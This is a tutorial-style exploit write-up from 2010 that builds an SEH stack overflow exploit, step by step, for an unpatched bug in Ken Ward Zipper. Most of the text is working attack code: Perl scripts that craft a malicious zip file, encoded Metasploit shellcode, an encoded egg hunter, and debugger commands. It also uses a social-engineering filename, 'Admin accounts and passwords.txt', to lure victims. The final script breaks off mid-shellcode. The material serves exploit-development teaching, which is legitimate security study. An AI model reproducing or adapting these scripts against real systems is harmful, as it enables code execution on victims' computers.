Abysssec Security Researches » Exploits / BUG Decryption

Ken Ward Zipper Stack BOF 0day – a not so typical SEH exploit

corelanc0d3r — Thu, 18 Mar 2010 12:31:56 +0000

About 2 weeks ago, I published a somewhat detailed explanation about an exploit I wrote for a – what some people would call “lame” - bug which I discovered in quickzip. In case you missed these articles, the articles were posted on the Offensive Security Blog : Part 1 and Part 2.

Ok, I agree, there are a lot more impressive bugs than this one, but the process of writing a working exploit was interesting to say the least. I had to deal with all kinds of hurdles, but by blending a little bit of creativity and persistence, I managed to pull it off.

Interestingly enough, I found a similar “lame” bug in another unzipper. The author decided to ignore my emails, so today I will disclose the details and explain how to write the exploit for this vulnerability.

If you’ve read the articles I wrote on the Offensive Security Blog, then you will discover that this particular exploit is quite similar to the one for quickzip… but this time we will even have to push things a little bit further.

I have received quite some feedback about the writing style I applied to those 2 articles. Apparently people like the combination of a detailed explanation, with the concept of making the document look like a some kind of exercise at the same time.

Based on that feedback, I decided to apply the same concept on this post. This translates into the fact that I have put a marker on some “strategic” places in this article, indicating that you should stop reading and that you should think about the current issue/situation/… and try to figure out for yourself how you would approach a given problem.

This marker will look like this :

Fasten your seatbelts, let’s go.

Environment setup & triggering the bug

I used the following environment and tools to build the exploit :

XP SP3 English Professional, fully patched, running inside VirtualBox
The vulnerable application : Ken Ward Zipper
Perl (I used ActiveState Perl 5.8.9)
Immunity Debugger 1.73, with pvefindaddr plugin
Metasploit 3 with custom MessageBox payload module (get a copy here – almost at bottom of that post)
alpha2 encoder

Note : In case you already have pvefindaddr installed : you can verify that you have the latest version by running

!pvefindaddr update

Pretty much identicaly to the bug in quickzip, the bug in Ken Ward’s zipper gets triggered by opening a specially crafted zip file from within the unzip utility, and double-clicking on the file inside the zip (in an attempt to extract and open it).

To make things more attractive, I will try to craft the exploit in such a way, to make the filename inside the zip file appear as if it’s a valid and perhaps interesting text file.

The basic structure of the malicious zip file looks like this :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

my $payload = "A" x 4064;
$payload = $payload.".txt";
my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

This script will create a zip file that will crash our application.

Usually, when an application crashes, one of the first things any exploit developer is looking for is to find out whether registers were overwritten, if EIP or SEH records are overwritten, and at what offsets these overwrites occurred.

In order to make that process easier, we won’t run the script as it is, but we will create a cyclic “Metasploit” pattern first (4064 characters) and put that in $payload. You will understand why in just a few moments.

Open Immunity Debugger. In the command bar at the bottom of the debugger, type in the following command :

!pvefindaddr pattern_create 4064

This will generate a cyclic/unique pattern, write it to the Immunity Debugger log window, and also to a file called “mspattern.txt”, which can be found in the Immunity Debugger application folder. Open this file, copy the pattern, and paste in into the script (effectively replacing (“A” x 4064) with the unique pattern).

Create the zip file :

C:\sploits\kenward>perl boom.pl
[+] Preparing payload
[+] Removing old zip file
[+] Writing payload to file
[+] Wrote 8234 bytes to file corelan_kenward.zip
[+] Payload length : 4068

C:\sploits\kenward>

Note : Ken Ward zipper will remember the last zip file that have opened. If this file still exists, it will open it automatically. So if you want to be sure to start from a clean situation, remove all zip files prior to opening zip4.exe, and then generate the zip file again.

Open Ken Ward zipper. When you see the main application screen, open Immunity Debugger and attach it to zip4.exe

The application will be paused at ntdll.DbgBreakPoint. Simply press F9 to continue to run the application. Go back to the application. Use the “Open an existing file to unzip” button and select the corelan_kenward.zip file

When the file is loaded in the application, you should see something like this :

The filename column clearly points to the first characters of a cyclic pattern.

Trigger the bug : double-click on the Filename.

Immunity will now take focus again, because it catched an exception.

 Address=00408EB1
 Message=[11:27:20] Access violation when writing to [00140000]

That’s clearly a stack overflow. We attempted to write a dword ptr (at [ESI]) beyond the end of the current stack frame [EDI], which points at 0x0013FFFE before the write instruction is executed. This caused an access violation.

Evaluating the crash

Making the application crash was not that difficult.

We decided to use a long cyclic pattern string to produce the crash, which means that we can save some time and (with Immunity still attached to the crashed application) use the pvefindaddr plugin to do some research about the crash. (This is why I asked you to use a unique pattern instead of just A’s – remember ?)

In Immunity, simply run the following command :

!pvefindaddr suggest

This will evaluate registers and SEH chain, and will look for references to a cyclic pattern. If the plugin found references in a register, it will calculate offsets. Wait a few seconds until the output is generated and look at the Immunity Debugger Log window for the results :

The 2 most important things we see are

a SEH record is overwritten
the offset to next SEH is 1022 bytes (offset might be slightly different on your machine !)

That means that it should be fairly easy to get code execution, as long as we can bypass any protection mechanisms in place (safeseh, etc)

Confirm offsets

Let’s change the script to confirm that the offsets are correct. At the same time, we will also change the payload a bit, making the filename look like an interesting file at the same time. After all, we control the filename inside the zip file, so perhaps we can do something with it.

Let’s have a look at this script :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $junk = "A" x ($offset - length($filename));
my $nseh="BBBB";
my $seh="CCCC";
my $payload = $filename.$junk.$nseh.$seh;
my $rest = "D" x ($size-length($payload));

$payload=$payload.$rest.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

As said before, I will try to make the filename inside the zip file look like something attractive (hence “Admin accounts and passwords.txt”) , and I will some spaces after this filename (to make it look more genuine). I will fill up the rest of the buffer before nSEH (up to 1022 bytes) with A’s.

At nseh we will put 42424242 and at SEH we will write 43434343. The remaining space of the 4064 bytes will be filled with D’s. (44444444).

Create the zip file. Open zip4.exe, and attach Immunity to the application. Then open the zip file :

We clearly see our fake filename. Double click the “Admin accounts and passwords.txt” filename. Immunity should catch the exception and the SEH chain should look like this :

On the stack, we can see our payload, we can see that it has overwritten a SE record, and we also see that the D’s are available on the stack after the SE record.

SEH : pop pop ret, jump, exec => owned ?

In normal SEH based exploits, the goal is to find a pointer to an address that would allow us to jump to the 4 bytes at next SEH and execute those bytes. The most common technique to do this, is using a pointer to pop pop ret.

When pop pop ret returns, in most cases the 4 bytes at nseh are used to jump to payload (either before or after the SEH record) in order to get code execution at that location. So in normal cases, it takes only a few minutes to pull this together and build a working exploit.

Is this logic correct ? Will that lead to code execution ? And where will you get the pointer to p/p/r from ?

The p/p/r pointer

Because of exception handling abuse protection mechanisms (Software DEP/Safeseh etc), we have to find an address that will allow us to execute a pop pop ret, effectively bypassing thesese protection mechanisms. The most common way to bypass safeseh, is by using a pointer to p/p/r from a non-safeseh compiled module (or the executable itself, if it’s not safeseh protected either).

If no usable address can be found, you can also try to use a p/p/r from one of the OS modules that are loaded together with the application. The disadvantage of this approach is that the exploit would probably only work the operating system/service pack that was used to build the code on.

Anyways, let’s try to make it universal/generic.

The pvefindaddr plugin provides for an easy way to list all p/p/r pointers, by querying all modules that are loaded when the application crashed, and that are not safeseh protected.

Simply run this command, with Immunity attached to the application, at crash time :

!pvefindaddr p

Now leave the debugger alone and let it do the search. This can take up to a few minutes (after all, it will search for all possible pop pop ret combinations, in all loaded modules !), and it might take all CPU… so just leave it alone for a while. All output will be written to the Immunity Log window, and to a file called ppr.txt (generated inside the Immunity Debugger application folder)

When the search process has finished, Immunity Debugger will become responsive again and display the number of found addresses at the end of the Log (and in the status bar)

2397 addresses, plenty of choice.

The non-OS, non-safeseh protected modules are :

=> only zip4.exe (the other ones are from the Windows OS, and those may be different across other versions of the Windows OS/Service Pack). So let’s focus on the executable itself. As you can see in the output above, the executable is loaded into memory at base address 0×00400000. This address starts with a null byte, so we have to take that into consideration.

Open the ppr.txt file, take the first available pointer from zip4.exe, and replace the 4 C’s at SE Handler with this address.

(so basically, replace my $seh=”CCCC”; with my $seh = pack(‘V’,0x00402AFB); create a new zip file and trigger the crash again)

When Immunity catches the exception, the SEH chain looks like this :

We see 2 things :

The address 0x00402AFB got replaced with 0x00402A76
The access violation occurs in a different instruction. This is caused because of the null byte in the p/p/r address (which acts as a string terminator). This is fine, but the fact that the address changed means that we have to deal with a character set limitation.

So this one will take a little bit longer than just a few minutes.

How would you approach this character set limitation ? What are the consequences of this limitation ? Is there only an impact on the p/p/r pointer ? Or also on other parts of the payload ?

Character set limitation

This is not new. When I discussed the exploit building process for the quickzip vulnerability (on the Offensive Security Blog), I noticed the same thing…

The result of that is that we can only use payload/addresses consisting of bytes that would be valid characters in a filename. (So if we limit our search to bytes that are either numbers or characters (lowercase/uppercase) from the alphabet, we should be fine. Further more, we’ll probably need to deal with this limitation for the entire payload, so we’ll have to keep this in mind.

Open ppr.txt again. In the output, you can see if an address would be compatible with this kind of limitation… The pvefindaddr plugin puts a marker next to addresses, indicating if the address is ascii printable and optionally if it only contains numbers/alphabet characters).

Addresses that contain ascii printable bytes only, will have a marker “[ Ascii printable ]“. If the address only contains nums&alphabet, it will also state “[Num&Alphabet Chars only !]“. That means that we can easily search for matching addresses using the following DOS command :

C:\Program Files\Immunity Inc\Immunity Debugger>type ppr.txt | findstr "Ascii" | findstr "Num"

C:\Program Files\Immunity Inc\Immunity Debugger>

0 results. But we are being too strict really. The [ Ascii printable ] marker will not show any addresses that start with a null byte. (You can, of course, change the pvefindaddr plugin). On top of that, some non-alphabet characters will also work fine (spaces, etc).

So perhaps we should just manually look at the ascii-printable addresses in the text file, and then locate one that will do the job. (www.asciitable.com)

Let’s try 0x00415A68

0×41 = “A”
0x5A = “Z”
0×68 = “h”

Put this address at $seh and try again

That looks a lot better. Set a breakpoint on this address (bp 00415A68) and press Shift F9 to pass the exception to the application. The event handler should kick in and jump to 0x00415A68

Use F7 to step through the instructions (basically execute one instruction at a time), until after the RETN instruction is executed. The RET should make you land back at the 4 bytes at nseh (BBBB) :

So far so good.

nseh jumpcode, but where to ?

We can use the 4 bytes at nseh to make a jump.

Where should we make the jump to ? As you can see on the stack, the D’s that were placed in the payload buffer after overwriting the SEH structure are not visible anymore. It looks like the null byte in the ppr address terminated the string, and now the D’s are “gone”.

This means that, at nseh, you can only jump back. Jumping forward does not make any sense, because we no longer control the bytes on the stack after the SEH record was overwritten.

But we do control most part of the stack before the SEH record was overwritten.

In theory, we should have like 1022 bytes (- the bytes needed for the filename and spaces at the beginning of the payload). Whether these 1022 ( minus some ) bytes can be fully used or not, is not clear at this point.

We can, for example, see on the stack that in the buffer with A’s (which sit between the fake filename (start of the string), and the location in the string used to overwrite SEH), some nulls have been inserted.

If we continue to scroll up in the stack view, we get closer to the start of the buffer, and eventually we can find the fake filename, spaces and the start of the A’s (at 0013F58E)

The current location, when the pop pop ret is executed, is 0013F908. So that means that we have about 890 bytes at our disposal.

Since we know that the buffer is subject to a character set limitation, we will most likely need to encode all instructions/shellcode before we can execute them. Encoding will increase the total shellcode size, and the code that we’ll probably to align registers and stack may need to be encoded too. So we might end up with some sizing issues here. 890 bytes is not bad, but it’s not huge either.

Anyways, we will start by jumping back at nseh (because that’s the only option we have at this point). Because of the character set limitation, we cannot use the 0xeb opcode for this.

0xEB won’t work. So what are our options to make a jump back ?

Answer : we still can use conditional jumps to jump back. Look at the state of the flags when you land back from the pop pop ret instructions :

C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)

Based on these flags, we can use JE (0×74) to make a jump back. This one will make a short jump if the zero flag is 1. This short jump instruction takes a single byte offset. Because of the character set limitation, the amount of bytes we are able to jump back will be limited to a small range.

In the quickzip writeup, we learned that 0×74 with offset 0xF7 would translate/get converted into 0×74 0×98, making a jump back of 102 bytes.

Let’s fnd out if this works :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $junk = "A" x ($offset - length($filename));
my $nseh="\x74\xf7\x90\x90";   #f7 becomes 98 -> jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$junk.$nseh.$seh;
my $rest = "D" x ($size-length($payload));

$payload=$payload.$rest.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

Right after the pop pop ret is executed, we land at the backward jump at nseh, and the CPU view in Immunity looks like this :

Backward jump works, but what can we do with it ?

Before deciding where to put our shellcode and changing jump back values if needed, we need to figure what we want to do.

We have about 890 bytes, more or less. How do we want to use those bytes ? Is that the location we have to put our shellcode at ?

Well, let’s not just believe what we see and don’t see. Let’s find out and get the facts before taking any decisions. As Oscar Wilde once said : “When you assume, you make an ass out of u and me”.

The null byte at SEH made the remaining part of the buffer string “disappear”, but that does not mean that this string is not availabe in memory anywhere. And if it is available in memory, then we may be able to use the 890 bytes to jump to the real shellcode in memory… and that changes the situation.

In order to find that out, we will write some real shellcode in the buffer (after the SEH overwrite), and then we will use pvefindaddr to search for it.

Let’s create some shellcode, and encode the shellcode to avoid that it would break the zip file structure.

./msfpayload windows/messagebox TITLE="CORELAN"
     TEXT="corelanc0d3r says hi to the Abysssec.com blog visitors" R
 | ./msfencode -e x86/alpha_mixed -t perl

This will produce 690 bytes of shellcode

[*] x86/alpha_mixed succeeded with size 690 (iteration=1)

We will put the shellcode at the end of the payload, and we will also write it to a file at c:\tmp\shellcode.bin. The latter is required for pvefindaddr later on

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $junk = "A" x ($offset - length($filename));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$junk.$nseh.$seh;

my $shellcode =
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

print "[+] Writing shellcode to file\n";
open(FILE,">c:\\tmp\\shellcode.bin");
print FILE $shellcode;
close(FILE);
print "[+] Wrote " . length($shellcode)." bytes to file\n";

Create the new zip file, then trigger the overflow again. Allow pop pop ret to kick in, and step through until you land back at nseh. (Which still contains the jump back code). Don’t execute the jump back code yet, but instead of that, run the following command :

!pvefindaddr compare c:\tmp\shellcode.bin

That’s great news. Our shellcode was found in memory and it was not modified. So if we can make a jump to that location, we have a good chance of getting it to execute.

Just keep in mind that the address where the shellcode has been found, will most likely not be static/reliable. So in order to be safe, we’ll have to use an egg hunter.

Back to our initial question : what can and will we do with the jump back code at nseh ?

Answer : we need to write an egg hunter in the first part of the buffer (first part = part before overwriting the SEH record), so we have to use the jump back as starting point to eventually jump to the egg hunter and let it do it’s magic work.

The Egg hunter

Before we can even think about running the egg hunter, we will have to take a couple of steps

we will need to encode the egg hunter (because we will place it in the buffer before overwriting SEH). We will use the alpha2 encoder for this. This encoder will require us to prepare a register (make it point exactly to the first byte of the encoded egg hunter), and we will have to use that register as baseregister when encoding the hunter. I decided to take edx for this purpose.
in order to set a register to the correct value (and jump to it to get the egg hunter to run), we will have to write some instructions. Unfortunately, these instructions are not character set compatible, so we will need to use a custom decoder for this.
This custom decoder will produce the instructions required to set the register (edx) to the correct value, and after the instructions were produced we need to get these instructions to execute. The easiest way to do so is by making esp point to a location directly (or almost) directly below the custom decoder, so when the decoder stops running, the decoded instructions would get executed right away.

Let’s start with encoding the egg hunter and placing it in the buffer. After all, we will need to have its base address so we can write the instructions that are needed to put this baseaddres into edx.

The egg hunter I will use is the one that uses NtAccessCheckAndAuditAlarm :

my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42".
"\x52\x6A\x02\x58\xCD\x2E".
"\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". # tag: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

We can encode it by

writing the egg hunter to a file first
feeding the binary egg hunter to alpha2

Script to write egg hunter to a file :

root@bt4:/pentest/exploits/alpha2# cat writecode.pl
#!/usr/bin/perl
# Little script to write shellcode to file
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800

my $code=
"\x66\x81\xCA\xFF\x0F\x42".
"\x52\x6A\x02\x58\xCD\x2E".
"\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". # tag: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

print "Writing code to file code.bin...\n";
open(FILE,">code.bin");
print FILE $code;
close(FILE);

root@bt4:/pentest/exploits/alpha2# perl writecode.pl
Writing code to file code.bin...

root@bt4/pentest/exploits/alpha2#

Feed egg hunter to alpha2 :

root@bt4:/pentest/exploits/alpha2# ./alpha2 edx < code.bin
JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIRFMQzjY
otOqRaBCZuRbxxMFNWLUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA

Now put this encoded egg hunter in the payload :

put egg hunter right after the $filename
modify the $junk length to take the egg hunter size into consideration
add the 2 egg hunter tags (“w00tw00t”) in front of the shellcode

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $junk = $egghunter . "A" x ($offset - length($filename.$egghunter));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$junk.$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
